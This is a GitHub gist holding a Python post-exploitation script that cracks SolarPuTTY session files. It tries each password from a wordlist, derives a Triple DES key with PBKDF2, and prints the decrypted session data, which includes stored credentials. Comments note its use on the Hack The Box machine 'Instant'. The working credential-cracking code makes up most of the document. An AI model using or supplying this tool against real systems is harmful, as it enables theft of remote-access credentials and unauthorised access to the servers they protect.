Last active
January 2, 2025 05:54
-
-
Save xHacka/052e4b09d893398b04bf8aff5872d0d5 to your computer and use it in GitHub Desktop.
SolarPuTTYDecrypt: A post-exploitation tool to decrypt SolarPutty's sessions files, rewritten in Python. Original Author: Paolo Stagno (@Void_Sec - voidsec.com)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import base64 | |
import sys | |
from Crypto.Cipher import DES3 | |
from Crypto.Protocol.KDF import PBKDF2 | |
def decrypt(passphrase, ciphertext): | |
data = '' | |
try: | |
# Decode the base64 encoded ciphertext | |
array = base64.b64decode(ciphertext) | |
salt = array[:24] | |
iv = array[24:32] | |
encrypted_data = array[48:] | |
# Derive the key using PBKDF2 | |
key = PBKDF2(passphrase, salt, dkLen=24, count=1000) | |
# Create the Triple DES cipher in CBC mode | |
cipher = DES3.new(key, DES3.MODE_CBC, iv) | |
# Decrypt the data | |
decrypted_data = cipher.decrypt(encrypted_data) | |
# Remove padding (PKCS7 padding) | |
padding_len = decrypted_data[-1] | |
decrypted_data = decrypted_data[:-padding_len] | |
data = ''.join(chr(c) for c in decrypted_data if chr(c).isascii()) | |
except Exception as e: | |
print(f'Error: {e}') | |
return data | |
if len(sys.argv) < 3: | |
print(f'Usage: {sys.argv[0]} putty_session.dat wordlist.txt') | |
exit(1) | |
with open(sys.argv[1]) as f: | |
cipher = f.read() | |
with open(sys.argv[2]) as passwords: | |
for i, password in enumerate(passwords): | |
password = password.strip() | |
decrypted = decrypt(password, cipher) | |
print(f'[{i}] {password=}', end='\r') | |
if 'Credentials' in decrypted: | |
print(f'\r[{i}] {password=} {" " * 10}') | |
print() | |
print(decrypted) | |
break |
Tested with:
➜ pip freeze | sls crypto
cryptography==41.0.5
pycryptodome==3.21.0
oh thank god, i was banging my head against the wall trying to use dotnet
Thank the lord
You are here for HTB Instant.
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
More info:
Original Author: Paolo Stagno (@Void_Sec - voidsec.com)